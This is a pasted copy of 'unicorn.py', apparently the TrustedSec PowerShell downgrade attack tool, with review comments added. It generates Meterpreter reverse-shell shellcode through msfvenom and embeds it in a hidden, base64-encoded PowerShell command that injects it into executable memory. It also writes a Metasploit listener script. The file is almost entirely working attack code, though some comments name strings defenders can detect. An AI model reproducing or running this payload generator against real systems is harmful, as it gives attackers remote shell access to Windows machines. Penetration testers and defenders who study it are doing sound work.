opexxx

unicorn.py

Mar 7th, 2014
  1. #!/usr/bin/python
  2. #
  3. # Magic Unicorn - PowerShell downgrade attack tool
  4. #
  5. # Written by: Dave Kennedy (@dave_rel1k)
  6. # Company: TrustedSec (@TrustedSec) https://www.trustedsec.com
  7. #
  8. # Real quick down and dirty for native x86 powershell on any platform
  9. #
  10. # Usage: python unicorn.py payload reverse_ipaddr port
  11. # Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
  12. #
  13. # Requirements: Need to have Metasploit installed.
  14. #
  15. # Special thanks to Matthew Graeber and Josh Kelley
  16. #
  17. import base64
  18. import re
  19. import subprocess
  20. import sys
  21.  
  22. # generate base shellcode
def generate_shellcode(payload,ipaddr,port):
    """Run msfvenom for *payload* and return its output as one compact string.

    The msfvenom output is read from stdout and every ';', space, '+', '"',
    newline and literal 'buf=' is removed from it before it is returned.
    Python 2 only (relies on dict.iteritems and str output from the pipe).
    """
    # accept the port either bare ("443") or in "LPORT=443" form
    lport = port.replace("LPORT=", "")

    # NOTE(review): the command line is built by %-interpolation and run with
    # shell=True, so shell metacharacters in payload/ipaddr/port are
    # interpreted by the operator's shell.  The values come straight from
    # sys.argv; any wrapper that forwards input it does not control should
    # validate it before calling this function.
    command = "msfvenom -p %s LHOST=%s LPORT=%s c" % (payload,ipaddr,lport)
    child = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
    output = child.communicate()[0]

    # strip the formatting characters so only the escaped byte text is left;
    # the patterns are applied in the dict's own iteration order
    strip_map = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'buf=' : ''}
    for needle, replacement in strip_map.iteritems():
        output = output.replace(needle, replacement)
    return output.rstrip()
  31.  
def format_payload(payload, ipaddr, port):
    """Build the encoded PowerShell command line and the matching handler file.

    Takes the text returned by generate_shellcode(), rewrites it as a
    comma-separated list of 0x-prefixed values, substitutes that list into a
    fixed PowerShell template, and writes two files into the current working
    directory: powershell_attack.txt (the full "powershell ... -enc" command)
    and unicorn.rc (a Metasploit resource script for the listener).  Both
    files are opened with mode "w", so existing files with those names are
    overwritten.  Prints two status lines and returns None.

    What a defender can key on, all visible in the literals below: the outer
    process is started as "powershell -nop -wind hidden -noni -enc <base64>";
    on a 64-bit host the script re-launches the syswow64 copy of powershell
    with "-nop -noni -enc"; the decoded script calls Add-Type with namespace
    "Win32Functions" and declares VirtualAlloc, CreateThread and memset.
    Process-creation logging that records command lines and PowerShell
    script block logging, where enabled, are where these strings surface.
    """
    # generate our shellcode first
    shellcode = generate_shellcode(payload, ipaddr, port).rstrip()
    # rewrite every literal "\x" as "0x" so each byte reads as a PowerShell
    # hex integer
    shellcode = re.sub("\\\\x", "0x", shellcode)
    # number of characters collected into the current group
    counter = 0
    # the group being assembled; flushed every four characters ("0xNN")
    floater = ""
    # accumulated "0xNN,0xNN,..." output
    newdata = ""
    # iterating a str yields one character at a time, so `line` is a single
    # character despite its name
    for line in shellcode:
        floater = floater + line
        counter = counter + 1
        if counter == 4:
            newdata = newdata + floater + ","
            floater = ""
            counter = 0

    # drop the trailing comma; characters left in floater that never reached
    # a full group of four are not appended
    shellcode = newdata[:-1]
   
    # Fixed PowerShell template; %s receives the byte list built above.
    # The embedded script declares P/Invoke signatures for VirtualAlloc and
    # CreateThread (kernel32.dll) and memset (msvcrt.dll), compiles them with
    # Add-Type, calls VirtualAlloc with 0x40 (PAGE_EXECUTE_READWRITE) as the
    # protection argument, copies the bytes one at a time with memset, calls
    # CreateThread on the buffer and then sleeps in a loop.  When
    # [IntPtr]::Size is 8 it re-runs itself through the syswow64 powershell.
    powershell_code = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
    # -enc takes base64 of the UTF-16LE script text, hence the explicit
    # encode; str + b64encode() concatenates here because both are Python 2 str
    full_attack = "powershell -nop -wind hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le'))  

    # write out the encoded command line
    # NOTE(review): file() is the Python 2 builtin, and with no try/finally
    # the handle stays open if write() raises
    filewrite = file("powershell_attack.txt", "w")
    filewrite.write(full_attack)
    filewrite.close()

    # write out the Metasploit resource file for the listener
    # NOTE(review): payload, ipaddr and port are interpolated unvalidated, so
    # a value containing a newline would add lines to the rc file - confirm
    # callers only pass operator-controlled arguments
    filewrite = file("unicorn.rc", "w")
    filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n" % (payload,ipaddr,port))
    filewrite.close()

    print "[*] Exported powershell output code to powershell_attack.txt."
    print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute."
  70.  
  71. # pull the variables needed for usage
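# Read the three positional arguments.  Only the argv lookups sit inside the
# try, so an IndexError raised while the payload is being built surfaces as a
# traceback instead of being mistaken for a usage error.
try:
    payload = sys.argv[1]
    ipaddr = sys.argv[2]
    port = sys.argv[3]

# fewer than three arguments were given: print the banner and usage text
except IndexError:

    print r"""
                                                        ,/
                                                       //
                                                     ,//
                                         ___   /|   |//
                                     `__/\_ --(/|___/-/
                                  \|\_-\___ __-_`- /-/ \.
                                 |\_-___,-\_____--/_)' ) \
                                  \ -_ /     __ \( `( __`\|
                                  `\__|      |\)\ ) /(/|
          ,._____.,            ',--//-|      \ |  '   /
         /     __. \,          / /,---|       \      /
        / /    _. \ \       `/`_/ _,'        |     |
       |  | ( (  \  |      ,/\'__/'/          |     |
       |  \ \`--, `_/_------______/           \(   )/
       | | \ \_. \,                            \___/\
       | |  \_   \ \                                \
       \ \   \_ \  \  /                             \
        \ \ \._  \__ \_|       |                       \
         \ \___  \     \      |                        \
          \__ \__ \ \_ |       \                        |
          |  \_____ \ ____      |                        |
          | \ \__ ---' .__\    |        |               |
          \ \__ ---   /   )     |        \             /
           \  \____/ / ()(      \         `---_       /|
            \__________/(,--__    \_________.    |    ./ |
              |     \ \ `---_\--,           \  \_,./   |
              |      \ \_ ` \   /`---_______-\  \\    /
               \     \.___,`|   /              \  \\   \
                \    |  \_ \|   \             (   |:    |
                 \   \     \   |             /  / |    ;
                  \   \     \   \         ( `_'   \ |
                   \.   \     \.   \         `__/   |  |
                     \  \      \.  \               |  |
                      \  \       \ \              (  )
                       \  |        \ |              |  |
                        |  \        \ \             I  `
                        ( __;        ( _;            ('-_';
                        |___\       \___:            \___:
"""
    print "Real quick down and dirty for native x86 powershell on any platform"
    print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com"
    print "Happy Magic Unicorns."
    print "\n"
    print "Usage: python unicorn.py payload reverse_ipaddr port"
    print "Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443"

# all three arguments present: build the output files
else:
    format_payload(payload,ipaddr,port)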